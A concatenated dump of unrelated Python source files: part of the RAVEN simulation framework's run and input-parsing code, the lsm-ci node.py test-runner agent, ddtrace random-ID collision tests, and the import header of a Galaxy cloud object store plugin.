This method checks the coherence of the simulation step by step
@ In, stepInstance, instance, instance of the step
@ In, stepName, string, the name of the step to check
@ Out, None
"""
for [role, myClass, objectType, name] in stepInstance.parList:
if myClass != 'Step' and myClass not in list(self.entities.keys()):
self.raiseAnError(IOError, f'For step named "{stepName}" the role "{role}" has been ' +
f'assigned to an unknown class type "{myClass}"!')
if name not in self.entities[myClass]:
self.raiseADebug('name:',name)
self.raiseADebug('myClass:',myClass)
self.raiseADebug('list:',list(self.entities[myClass].keys()))
self.raiseADebug('entities[myClass]',self.entities[myClass])
self.raiseAnError(IOError, f'In step "{stepName}" the class "{myClass}" named "{name}" ' +
f'supposed to be used for the role "{role}" has not been found!')
if myClass != 'Files':
# check if object type is consistent
objtype = self.entities[myClass][name].type
def __readRunInfo(self,xmlNode,runInfoSkip,xmlFilename):
"""
Method that reads the xml input file for the RunInfo block
@ In, xmlNode, xml.etree.Element, the xml node that belongs to Simulation
@ In, runInfoSkip, set, the RunInfo child nodes to skip
@ In, xmlFilename, string, xml input file name
@ Out, None
"""
if 'verbosity' in xmlNode.attrib.keys():
self.verbosity = xmlNode.attrib['verbosity']
self.raiseAMessage('Global verbosity level is "',self.verbosity,'"',verbosity='quiet')
for element in xmlNode:
if element.tag in runInfoSkip:
self.raiseAWarning("Skipped element ",element.tag)
elif element.tag == 'printInput':
text = element.text.strip() if element.text is not None else ''
#extension fixing
if len(text) >= 4 and text[-4:].lower() == '.xml':
text = text[:-4]
# if the user asked to not print input instead of leaving off tag, respect it
if utils.stringIsFalse(text):
self.runInfoDict['printInput'] = False
# if the user didn't provide a name, provide a default
elif len(text)<1:
self.runInfoDict['printInput'] = 'duplicated_input.xml'
# otherwise, use the user-provided name
else:
self.runInfoDict['printInput'] = text+'.xml'
elif element.tag == 'WorkingDir':
# first store the cwd, the "CallDir"
self.runInfoDict['CallDir'] = os.getcwd()
# then get the requested "WorkingDir"
tempName = element.text
if element.text is None:
self.raiseAnError(IOError, 'RunInfo.WorkingDir is empty! Use "." to signify "work here" or specify a directory.')
if '~' in tempName:
tempName = os.path.expanduser(tempName)
xmlDirectory = os.path.dirname(os.path.abspath(xmlFilename))
self.runInfoDict['InputDir'] = xmlDirectory
if os.path.isabs(tempName):
self.runInfoDict['WorkingDir'] = tempName
elif "runRelative" in element.attrib:
self.runInfoDict['WorkingDir'] = os.path.abspath(tempName)
else:
if xmlFilename is None:
self.raiseAnError(IOError,'Relative working directory requested but xmlFilename is None.')
# store location of the input
xmlDirectory = os.path.dirname(os.path.abspath(xmlFilename))
self.runInfoDict['InputDir'] = xmlDirectory
rawRelativeWorkingDir = element.text.strip()
# working dir is file location + relative working dir
self.runInfoDict['WorkingDir'] = os.path.join(xmlDirectory,rawRelativeWorkingDir)
utils.makeDir(self.runInfoDict['WorkingDir'])
elif element.tag == 'maxQueueSize':
try:
self.runInfoDict['maxQueueSize'] = int(element.text)
except ValueError:
self.raiseAnError(IOError,'Value given for RunInfo.maxQueueSize could not be converted to an integer: {}'.format(element.text))
elif element.tag == 'RemoteRunCommand':
tempName = element.text
if '~' in tempName:
tempName = os.path.expanduser(tempName)
if os.path.isabs(tempName):
self.runInfoDict['RemoteRunCommand'] = tempName
else:
self.runInfoDict['RemoteRunCommand'] = os.path.abspath(os.path.join(self.runInfoDict['FrameworkDir'],tempName))
elif element.tag == 'NodeParameter':
self.runInfoDict['NodeParameter'] = element.text.strip()
elif element.tag == 'MPIExec':
self.runInfoDict['MPIExec'] = element.text.strip()
elif element.tag == 'threadParameter':
self.runInfoDict['threadParameter'] = element.text.strip()
elif element.tag == 'JobName':
self.runInfoDict['JobName' ] = element.text.strip()
elif element.tag == 'ParallelCommand':
self.runInfoDict['ParallelCommand' ] = element.text.strip()
elif element.tag == 'queueingSoftware':
self.runInfoDict['queueingSoftware' ] = element.text.strip()
elif element.tag == 'ThreadingCommand':
self.runInfoDict['ThreadingCommand' ] = element.text.strip()
elif element.tag == 'NumThreads':
self.runInfoDict['NumThreads' ] = int(element.text)
elif element.tag == 'totalNumCoresUsed':
self.runInfoDict['totalNumCoresUsed' ] = int(element.text)
elif element.tag == 'NumMPI':
self.runInfoDict['NumMPI' ] = int(element.text)
elif element.tag == 'internalParallel':
self.runInfoDict['internalParallel' ] = utils.interpretBoolean(element.text)
dashboard = element.attrib.get("dashboard",'False')
self.runInfoDict['includeDashboard' ] = utils.interpretBoolean(dashboard)
elif element.tag == 'batchSize':
self.runInfoDict['batchSize' ] = int(element.text)
elif element.tag.lower() == 'maxqueuesize':
self.runInfoDict['maxQueueSize' ] = int(element.text)
elif element.tag == 'MaxLogFileSize':
self.runInfoDict['MaxLogFileSize' ] = int(element.text)
elif element.tag == 'precommand':
self.runInfoDict['precommand' ] = element.text
elif element.tag == 'postcommand':
self.runInfoDict['postcommand' ] = element.text
elif element.tag == 'deleteOutExtension':
self.runInfoDict['deleteOutExtension'] = element.text.strip().split(',')
elif element.tag == 'headNode':
self.runInfoDict['headNode'] = element.text.strip()
elif element.tag == 'redisPassword':
self.runInfoDict['redisPassword'] = element.text.strip()
elif element.tag == 'remoteNodes':
self.runInfoDict['remoteNodes'] = [el.strip() for el in element.text.strip().split(',')]
elif element.tag == 'PYTHONPATH':
self.runInfoDict['UPDATE_PYTHONPATH'] = element.text.strip()
elif element.tag == 'delSucLogFiles' :
if utils.stringIsTrue(element.text):
self.runInfoDict['delSucLogFiles' ] = True
else:
self.runInfoDict['delSucLogFiles' ] = False
elif element.tag == 'logfileBuffer':
self.runInfoDict['logfileBuffer'] = utils.convertMultipleToBytes(element.text.lower())
elif element.tag == 'clusterParameters':
self.runInfoDict['clusterParameters'].extend(splitCommand(element.text)) #extend to allow adding parameters at different points.
elif element.tag == 'mode' :
self.runInfoDict['mode'] = element.text.strip().lower()
#parallel environment
if self.runInfoDict['mode'] in self.__modeHandlerDict:
self.__modeHandler = self.__modeHandlerDict[self.runInfoDict['mode']](self)
self.__modeHandler.XMLread(element)
else:
self.raiseAnError(IOError,"Unknown mode "+self.runInfoDict['mode'])
elif element.tag == 'expectedTime':
self.runInfoDict['expectedTime' ] = element.text.strip()
elif element.tag == 'Sequence':
for stepName in element.text.split(','):
self.stepSequenceList.append(stepName.strip())
elif element.tag == 'DefaultInputFile':
self.runInfoDict['DefaultInputFile'] = element.text.strip()
elif element.tag == 'CustomMode' :
modeName = element.text.strip()
modeClass = element.attrib["class"]
modeFile = element.attrib["file"]
#XXX This depends on if the working directory has been set yet.
# So switching the order of WorkingDir and CustomMode can
# cause different results.
modeFile = modeFile.replace("%BASE_WORKING_DIR%",self.runInfoDict['WorkingDir'])
modeFile = modeFile.replace("%FRAMEWORK_DIR%",self.runInfoDict['FrameworkDir'])
modeDir, modeFilename = os.path.split(modeFile)
if modeFilename.endswith(".py"):
modeModulename = modeFilename[:-3]
else:
modeModulename = modeFilename
os.sys.path.append(modeDir)
module = __import__(modeModulename)
if modeName in self.__modeHandlerDict:
self.raiseAWarning("duplicate mode definition " + modeName)
self.__modeHandlerDict[modeName] = module.__dict__[modeClass]
else:
self.raiseAnError(IOError,'RunInfo element "'+element.tag +'" unknown!')
def printDicts(self):
"""
utility function to print a summary of the dictionaries
@ In, None
@ Out, None
"""
def __prntDict(Dict,msg):
"""utility function capable to print a dictionary"""
for key in Dict:
msg+=key+'= '+str(Dict[key])+'\n'
return msg
msg=''
msg=__prntDict(self.runInfoDict,msg)
msg=__prntDict(self.stepsDict,msg)
msg=__prntDict(self.dataDict,msg)
msg=__prntDict(self.samplersDict,msg)
msg=__prntDict(self.modelsDict,msg)
msg=__prntDict(self.metricsDict,msg)
#msg=__prntDict(self.testsDict,msg)
msg=__prntDict(self.filesDict,msg)
msg=__prntDict(self.dataBasesDict,msg)
msg=__prntDict(self.outStreamsDict,msg)
msg=__prntDict(self.entityModules,msg)
msg=__prntDict(self.entities,msg)
self.raiseADebug(msg)
def run(self):
"""
Run the simulation
@ In, None
@ Out, None
"""
#TODO: can we remove the check on the existence of the files? It might make more sense to check them only when they are used as input, right before the step that uses them.
self.raiseADebug('entering the run')
#controlling the PBS environment
remoteRunCommand = self.__modeHandler.remoteRunCommand(dict(self.runInfoDict))
if remoteRunCommand is not None:
subprocess.call(args=remoteRunCommand["args"],
cwd=remoteRunCommand.get("cwd", None),
env=remoteRunCommand.get("env", None))
self.raiseADebug('Submitted in queue! Shutting down Jobhandler!')
self.jobHandler.shutdown()
return
#loop over the steps of the simulation
for stepName in self.stepSequenceList:
stepInstance = self.stepsDict[stepName] #retrieve the instance of the step
self.raiseAMessage('-'*2+' Beginning step {0:50}'.format(stepName+' of type: '+stepInstance.type)+2*'-')#,color='green')
self.runInfoDict['stepName'] = stepName #provide the name of the step to runInfoDict
stepInputDict = {} #initialize the input dictionary for a step. Never use an old one!!!!!
stepInputDict['Input' ] = [] #set the Input to an empty list
stepInputDict['Output'] = [] #set the Output to an empty list
#fill the 'take a step' input dictionary; just to recall: key = role played in the step, b = Class, c = Type, d = user-given name
for [key,b,c,d] in stepInstance.parList:
#Only for input and output we allow more than one object passed to the step, so for those we build a list
if key == 'Input' or key == 'Output':
stepInputDict[key].append(self.entities[b][d])
else:
stepInputDict[key] = self.entities[b][d]
#add the global objects
stepInputDict['jobHandler'] = self.jobHandler
#generate the needed assembler to send to the step
for key in stepInputDict.keys():
if type(stepInputDict[key]) == list:
stepindict = stepInputDict[key]
else:
stepindict = [stepInputDict[key]]
# check assembler. NB. If the assembler refers to an internal object the relative dictionary
# needs to have the format {'internal':[(None,'variableName'),(None,'variable name')]}
for stp in stepindict:
self.generateAllAssemblers(stp)
#if 'Sampler' in stepInputDict.keys(): stepInputDict['Sampler'].generateDistributions(self.distributionsDict)
#running a step
stepInstance.takeAstep(stepInputDict)
#--------------- finalize the step outputs (call finalize() on those that support it) -----------------
for output in stepInputDict['Output']:
if self.FIXME:
self.raiseAMessage('This is for the filter, it needs to go when the filtering strategy is done')
if "finalize" in dir(output):
output.finalize()
self.raiseAMessage('-'*2+' End step {0:50} '.format(stepName+' of type: '+stepInstance.type)+2*'-'+'\n')#,color='green')
self.jobHandler.shutdown()
self.messageHandler.printWarnings()
# implicitly, the job finished successfully if we got here.
self.writeStatusFile()
self.raiseAMessage('Run complete!', forcePrint=True)
def generateAllAssemblers(self, objectInstance):
"""
This method is used to generate all assembler objects at the Step construction stage
@ In, objectInstance, Instance, Instance of RAVEN entity, i.e. Input, Sampler, Model
@ Out, None
"""
if "whatDoINeed" in dir(objectInstance):
neededobjs = {}
neededObjects = objectInstance.whatDoINeed()
for mainClassStr in neededObjects.keys():
if mainClassStr not in self.entities.keys() and mainClassStr != 'internal':
self.raiseAnError(IOError,'Main Class '+mainClassStr+' needed by '+objectInstance.name+' unknown!')
neededobjs[mainClassStr] = {}
for obj in neededObjects[mainClassStr]:
if obj[1] in vars(self):
neededobjs[mainClassStr][obj[1]] = vars(self)[obj[1]]
elif obj[1] in self.entities[mainClassStr].keys():
if obj[0]:
if obj[0] not in self.entities[mainClassStr][obj[1]].type:
self.raiseAnError(IOError,'Type of requested object '+obj[1]+' does not match the actual type!'+ obj[0] + ' != ' + self.entities[mainClassStr][obj[1]].type)
neededobjs[mainClassStr][obj[1]] = self.entities[mainClassStr][obj[1]]
self.generateAllAssemblers(neededobjs[mainClassStr][obj[1]])
elif obj[1] == 'all':
# if 'all' we get all the objects of a certain 'mainClassStr'
for allObject in self.entities[mainClassStr]:
neededobjs[mainClassStr][allObject] = self.entities[mainClassStr][allObject]
else:
self.raiseAnError(IOError,'Requested object <{n}> is not part of the Main Class <{m}>!'
.format(n=obj[1], m=mainClassStr) +
'\nOptions are:', self.entities[mainClassStr].keys())
objectInstance.generateAssembler(neededobjs)
def clearStatusFile(self):
"""
Remove the status file from disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
try:
os.remove('.ravenStatus')
except OSError as e:
if os.path.isfile('.ravenStatus'):
self.raiseAWarning(f'RAVEN status file detected but not removable! Got: "{e}"')
def writeStatusFile(self):
"""
Write a status file to disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
with open('.ravenStatus', 'w') as f:
f.writelines('Success')
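# Minimal driver sketch (illustrative only; it mirrors the usage sequence in the
# Simulation class docstring, and the input file name is hypothetical):
#
#   import xml.etree.ElementTree as ET
#   sim = Simulation(frameworkDir)
#   root = ET.parse('my_input.xml').getroot()
#   sim.XMLpreprocess(root, cwd=os.path.dirname(os.path.abspath('my_input.xml')))
#   sim.XMLread(root, xmlFilename='my_input.xml')
#   sim.initialize()
#   sim.run()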
|
node.py
|
#!/usr/bin/env python2
"""
WARNING! This file is auto updated from the node manager. Any changes will
be lost when the client disconnects and reconnects.
This file is compatible with python2 and python3.
Theory of operation
1. Read the config file getting
- Server and port to connect too
- What arrays are available to use
2. Connect to the server
3. Wait for a command request
4. If the server connection goes away or no ping has been received, close the connection
and try to periodically re-establish communication
Command requests include:
ping - check to see if the connection is working
arrays - Return array information on what is available to test
running - Return which arrays are currently running tests
job_create - Submit a new test to run (Creates a new process)
jobs - Return job state information on all submitted jobs
job - Return job state information about a specific job
job_delete - Delete the specific job request freeing resources
job_completion - Retrieve the exit code and log for specified job
Service which runs test(s) on the same box as the service
See: https://github.com/tasleson/lsm-ci/blob/master/LICENSE
"""
import string
import random
import yaml
import os
import json
import sys
import pickle
from subprocess import call
from multiprocessing import Process
import testlib
import time
import traceback
import tempfile
import shutil
jobs = {}
config = {}
STARTUP_CWD = ""
NODE = None
def _lcall(command, job_id):
"""
Call an executable and return a tuple of (exit code, path of the file containing stdout & stderr)
"""
# Write output to a file so we can see what's going on while it's running
f = "/tmp/%s.out" % job_id
with open(f, "w", buffering=1) as log: # Max buffer 1 line (text mode)
exit_value = call(command, stdout=log, stderr=log)
return exit_value, f
def _file_name(job_id):
# If this log directory is located in /tmp, the system may remove the
# directory after a while, making us fail to log when needed.
log_dir = config["LOGDIR"]
if not os.path.exists(log_dir):
os.makedirs(log_dir)
base = "%s/%s" % (log_dir, job_id)
return base + ".out"
def _run_command(job_id, args):
ec = 0
cmd = []
log_dir = ""
try:
cmd = [config["PROGRAM"]]
log_dir = config["LOGDIR"]
cmd.extend(args)
(ec, output_file) = _lcall(cmd, job_id)
log = _file_name(job_id)
# Read in the output file in its entirety
with open(output_file, "r") as o:
out = o.read()
with open(log, "wb") as error_file:
pickle.dump(dict(EC=str(ec), OUTPUT=out), error_file)
error_file.flush()
# Delete file to prevent /tmp from filling up, but after we have
# written out error file, in case we hit a bug
os.remove(output_file)
except Exception:
testlib.p(
"job_id = %s cmd = '%s', log_dir = %s" % (job_id, str(cmd), log_dir)
)
testlib.p(str(traceback.format_exc()))
# This is a separate process, lets exit with the same exit code as cmd
sys.exit(ec)
def _rs(length):
return "".join(random.choice(string.ascii_lowercase) for _ in range(length))
def _load_config():
global config
cfg = os.path.dirname(os.path.realpath(__file__)) + "/" + "config.yaml"
with open(cfg, "r") as array_data:
config = yaml.safe_load(array_data.read())
# If the user didn't specify a full path in the configuration file we
# expect it in the same directory as this file
if config["PROGRAM"][0] != "/":
config["PROGRAM"] = (
os.path.dirname(os.path.realpath(__file__))
+ "/"
+ config["PROGRAM"]
)
# Let's make sure important external files/directories are present
if not os.path.exists(config["PROGRAM"]):
testlib.p("config PROGRAM %s does not exist" % config["PROGRAM"])
sys.exit(1)
if not (
os.path.exists(config["LOGDIR"])
and os.path.isdir(config["LOGDIR"])
and os.access(config["LOGDIR"], os.W_OK)
):
testlib.p(
"config LOGDIR not preset or not a "
"directory %s or not writeable" % (config["LOGDIR"])
)
sys.exit(1)
def _remove_file(job_id):
fn = _file_name(job_id)
try:
testlib.p("Deleting file: %s" % fn)
os.remove(fn)
except OSError as ioe:
testlib.p("Error deleting file: %s, reason: %s" % (fn, str(ioe)))
pass
def _update_state(job_id):
global jobs
job = jobs[job_id]
# See if the process has ended
p = job["PROCESS"]
p.join(0)
if not p.is_alive():
testlib.p("%s exited with %s " % (p.name, str(p.exitcode)))
sys.stdout.flush()
if p.exitcode == 0:
job["STATUS"] = "SUCCESS"
else:
job["STATUS"] = "FAIL"
def _return_state(job_id, only_running=False):
_update_state(job_id)
job = jobs[job_id]
if not only_running or (only_running and job["STATUS"] == "RUNNING"):
return {
"STATUS": job["STATUS"],
"ID": job["ID"],
"JOB_ID": job_id,
"PLUGIN": job["PLUGIN"],
}
return None
# State for tests that are currently running
# @returns JSON array with entries of the form:
# [{"STATUS": ..., "ID": ..., "JOB_ID": ..., "PLUGIN": ...}, ...]
def _only_running():
rc = []
for k in jobs.keys():
s = _return_state(k, True)
if s:
rc.append(s)
return rc
class Cmds(object):
"""
Class that handles the rest methods.
"""
@staticmethod
def ping():
"""
Used to see if the node manager can talk to the node.
:return: string pong and http code 200
"""
return "pong", 200, ""
# Returns systems available for running tests
@staticmethod
def arrays():
"""
Returns which arrays are available.
:return: array of tuples which gets converted into JSON and http 200
status code.
"""
rc = [(x["ID"], x["PLUGIN"]) for x in config["ARRAYS"]]
return rc, 200, ""
@staticmethod
def running():
"""
Returns dictionary which gets converted to JSON tests that
are still running.
:return: array of dictionary
[ {"STATUS": ['RUNNING'|'SUCCESS'|'FAIL'}, "ID": <array id>,
"JOB_ID": [a-z]{32}, "PLUGIN":'lsm plugin'}, ... ]
"""
rc = _only_running()
return rc, 200, ""
@staticmethod
def job_create(repo, branch, array_id):
"""
Submit a new test to run
:param repo: The git repo to use
:param branch: The git branch
:param array_id: The test array ID
:return:
412 - Job already running on specified array
400 - Input parameters are incorrect or missing
201 - Test started
"""
global jobs
testlib.p("Running test for %s %s %s" % (repo, branch, array_id))
if any([x for x in config["ARRAYS"] if x["ID"] == array_id]):
# Add a check to make sure we aren't already _running_
# a job for this array
for k, v in jobs.items():
if v["ID"] == array_id:
# Update status to make sure
_update_state(k)
if v["STATUS"] == "RUNNING":
return "", 412, "Job already running on array"
# Run the job
# Build the arguments for the script
uri = ""
password = ""
plug = ""
for a in config["ARRAYS"]:
if a["ID"] == array_id:
uri = a["URI"]
password = a["PASSWORD"]
plug = a["PLUGIN"]
break
# When we add rpm builds we will need client to pass
# which 'type' too
incoming = ("git", repo, branch, uri, password)
job_id = _rs(32)
p = Process(target=_run_command, args=(job_id, incoming))
p.name = "|".join(incoming)
p.start()
jobs[job_id] = dict(
STATUS="RUNNING", PROCESS=p, ID=array_id, PLUGIN=plug
)
return job_id, 201, ""
else:
return "", 400, "Invalid array specified!"
@staticmethod
def jobs():
"""
Returns all known jobs regardless of status
:return: array of dictionaries
"""
rc = []
for k in jobs.keys():
rc.append(_return_state(k))
return rc, 200, ""
@staticmethod
def job(job_id):
"""
Get the status of the specified job
:param job_id: ID of job to get status on
:return: job state
"""
global jobs
if job_id in jobs:
return _return_state(job_id), 200, ""
return "", 404, "Job not found!"
@staticmethod
def job_completion(job_id):
"""
Get the exit code and log file for the specified job
:param job_id: ID of job
:return: http status:
200 on success
400 if job is still running
404 if job is not found
json payload { "EC": <exit code>, "OUTPUT": "std out + std error"}
"""
if job_id in jobs:
j = jobs[job_id]
log = _file_name(job_id)
if j["STATUS"] != "RUNNING":
try:
testlib.p("Retrieving log file: %s" % log)
with open(log, "rb") as foo:
result = pickle.load(foo)
return json.dumps(result), 200, ""
except:
testlib.p("Exception in retrieving log file!")
testlib.p(str(traceback.format_exc()))
# We had a job in the hash, but an error while processing
# the log file, we will return a 404 and make sure the
# file is indeed gone
try:
del jobs[job_id]
_remove_file(job_id)
except:
# These aren't the errors you're looking for..., move
# along...
pass
return "", 404, "Job log file not found"
else:
return "", 400, "Job still running"
else:
testlib.p("Job ID %s not found in hash!" % job_id)
return "", 404, "Job not found"
@staticmethod
def job_delete(job_id):
"""
Delete a test that is no longer running, cleans up in memory hash and
removes log file from disk
:param job_id: ID of job
:return: http status 200 on success, else 400 if job is still running
or 404 if job is not found
"""
global jobs
if job_id in jobs:
j = jobs[job_id]
if j["STATUS"] != "RUNNING":
del jobs[job_id]
_remove_file(job_id)
return "", 200, ""
else:
return "", 400, "Job still running"
else:
return "", 404, "Job not found"
@staticmethod
def md5_files(files):
"""
Return the md5 for a list of files. A file name cannot contain any '/':
we restrict lookups to the directory containing node.py, since we only
expect to check files in that directory.
:param files: List of files
:return: An array of md5sums in the order the files were given to us.
"""
rc = []
for file_name in files:
if "/" in file_name:
return (
rc,
412,
"File %s contains illegal character" % file_name,
)
full_fn = os.path.join(
os.path.dirname(os.path.realpath(__file__)), file_name
)
if os.path.exists(full_fn) and os.path.isfile(full_fn):
rc.append(testlib.file_md5(full_fn))
else:
# If a file doesn't exist lets return a bogus value, then the
# server will push the new file down.
rc.append("File not found!")
return rc, 200, ""
@staticmethod
def _update_files(tmp_dir, file_data):
src_files = []
# Dump the file locally to temp directory
for i in file_data:
fn = i["fn"]
data = i["data"]
md5 = i["md5"]
if "/" in fn:
return "", 412, "File name has directory sep. in it! %s" % fn
tmp_file = os.path.join(tmp_dir, fn)
with open(tmp_file, "w") as t:
t.write(data)
if md5 != testlib.file_md5(tmp_file):
return "", 412, "md5 miss-match for %s" % tmp_file
src_files.append(tmp_file)
# Move the files into position
for src_path_name in src_files:
perms = None
name = os.path.basename(src_path_name)
dest_path_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)), name
)
# Before we move, lets store off the perms, so we can restore them
# after the move
if os.path.exists(dest_path_name):
perms = os.stat(dest_path_name).st_mode & 0o777
testlib.p("Moving: %s -> %s" % (src_path_name, dest_path_name))
shutil.move(src_path_name, dest_path_name)
if perms:
testlib.p("Setting perms: %s %s" % (dest_path_name, oct(perms)))
os.chmod(dest_path_name, perms)
return "", 200, ""
@staticmethod
def update_files(file_data):
"""
Given a file name, the file contents and the md5sum for each file, we dump
the contents to a tmp file, validate the md5 and, if all is well, replace
the existing file with it.
Note: file data is a hash with keys: 'fn', 'data', 'md5'
:param file_data:
:return: http 200 on success, else 412
"""
# Create a temp directory
td = tempfile.mkdtemp()
testlib.p("Updating client files!")
try:
result = Cmds._update_files(td, file_data)
except:
result = (
"",
412,
"Exception on file update %s " % str(traceback.format_exc()),
)
# Remove tmp directory and the files we left in it
shutil.rmtree(td)
return result
@staticmethod
def restart():
"""
Restart the node
:return: None
"""
global NODE
testlib.p("Restarting node as requested by node_manager")
os.chdir(STARTUP_CWD)
NODE.disconnect()
os.execl(sys.executable, *([sys.executable] + sys.argv))
def process_request(req):
"""
Processes the request.
:param req: The request
:return: Appropriate http status code.
"""
data = ""
ec = 0
error_msg = ""
if hasattr(Cmds, req.method):
if req.args and len(req.args):
data, ec, error_msg = getattr(Cmds, req.method)(*req.args)
else:
data, ec, error_msg = getattr(Cmds, req.method)()
NODE.return_response(testlib.Response(data, ec, error_msg))
else:
# Bounce this back to the requester
NODE.return_response(testlib.Response("", 404, "Command not found!"))
if __name__ == "__main__":
# Load the available test arrays from config file
STARTUP_CWD = os.getcwd()
_load_config()
server = config["SERVER_IP"]
port = config["SERVER_PORT"]
proxy_is_ip = config["PROXY_IS_IP"]
use_proxy = config["USE_PROXY"]
proxy_host = config["PROXY_HOST"]
proxy_port = config["PROXY_PORT"]
servers = [server, "ci.asleson.org"]
connection_count = 0
# Connect to server
while True:
# Round robin on IP address, starting with the one that is specified
# in user configuration.
server_addr = servers[connection_count % len(servers)]
testlib.p("Attempting connection to %s:%d" % (server_addr, port))
NODE = testlib.TestNode(
server_addr,
port,
use_proxy=use_proxy,
proxy_is_ip=proxy_is_ip,
proxy_host=proxy_host,
proxy_port=proxy_port,
)
if NODE.connect():
testlib.p("Connected to %s" % server_addr)
have_connected = True
# noinspection PyBroadException
try:
while True:
request = NODE.wait_for_request()
process_request(request)
except KeyboardInterrupt:
NODE.disconnect()
sys.exit(0)
except Exception:
testlib.p(str(traceback.format_exc()))
pass
# This probably won't do much as socket is quite likely toast
NODE.disconnect()
else:
connection_count += 1
# If we get here we need to re-establish connection, make sure we don't
# swamp the processor
time.sleep(10)
|
test_rand.py
|
from itertools import chain
import multiprocessing as mp
try:
from multiprocessing import SimpleQueue as MPQueue
except ImportError:
from multiprocessing.queues import SimpleQueue as MPQueue
import os
import threading
from ddtrace import Span
from ddtrace import tracer
from ddtrace.internal import _rand
from ddtrace.internal.compat import Queue
def test_random():
m = set()
for i in range(0, 2 ** 16):
n = _rand.rand64bits()
assert 0 <= n <= 2 ** 64 - 1
assert n not in m
m.add(n)
def test_fork_no_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits() for _ in range(100)}
child_rns = q.get()
assert rns & child_rns == set()
else:
# child
try:
rngs = {_rand.rand64bits() for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_fork_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits() for _ in range(100)}
child_rns = q.get()
assert rns & child_rns == set()
else:
# child
try:
rngs = {_rand.rand64bits() for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_multiprocess():
q = MPQueue()
def target(q):
q.put([_rand.rand64bits() for _ in range(100)])
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = [_rand.rand64bits() for _ in range(1000)]
ids = set(ids_list)
assert len(ids_list) == len(ids), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids_list) == len(child_ids), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_threadsafe():
# Check that the PRNG is thread-safe.
# This obviously won't guarantee thread safety, but it's something
# at least.
# To provide some validation of this method I wrote a slow, unsafe RNG:
#
# state = 4101842887655102017
#
# def bad_random():
# global state
# state ^= state >> 21
# state ^= state << 35
# state ^= state >> 4
# return state * 2685821657736338717
#
# which consistently fails this test.
q = Queue()
def _target():
# Generate a bunch of numbers to try to maximize the chance that
# two threads will be calling rand64bits at the same time.
rngs = [_rand.rand64bits() for _ in range(200000)]
q.put(rngs)
ts = [threading.Thread(target=_target) for _ in range(5)]
for t in ts:
t.start()
for t in ts:
t.join()
ids = set()
while not q.empty():
new_ids_list = q.get()
new_ids = set(new_ids_list)
assert len(new_ids) == len(new_ids_list), "Collision found in ids"
assert ids & new_ids == set()
ids = ids | new_ids
assert len(ids) > 0
def test_tracer_usage_fork():
q = MPQueue()
pid = os.fork()
# Similar test to test_fork() above except we use the tracer API.
# In this case we expect to never have collisions.
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
q.put(child_ids)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_tracer_usage_multiprocess():
q = MPQueue()
# Similar to test_multiprocess(), ensures that no collisions are
# generated between parent and child processes while using
# multiprocessing.
# Note that we have to be wary of the size of the underlying
# pipe in the queue: https://bugs.python.org/msg143081
def target(q):
ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(10)])
)
q.put(ids_list)
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = list(chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)]))
ids = set(ids_list)
assert len(ids) == len(ids_list), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_span_api_fork():
q = MPQueue()
pid = os.fork()
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
q.put(child_ids)
finally:
os._exit(0)
|
cloud.py
|
"""
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import os.path
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
)
from galaxy.util.sleeper import Sleeper
from .s3 import parse_config_xml
from ..objectstore import ConcreteObjectStore, convert_bytes
try:
from cloudbridge.factory import CloudProviderFactory, ProviderList
from cloudbridge.interfaces.exceptions import InvalidNameException
except ImportError:
CloudProviderFactory = None
ProviderList = None
log = logging.getLogger(__name__)
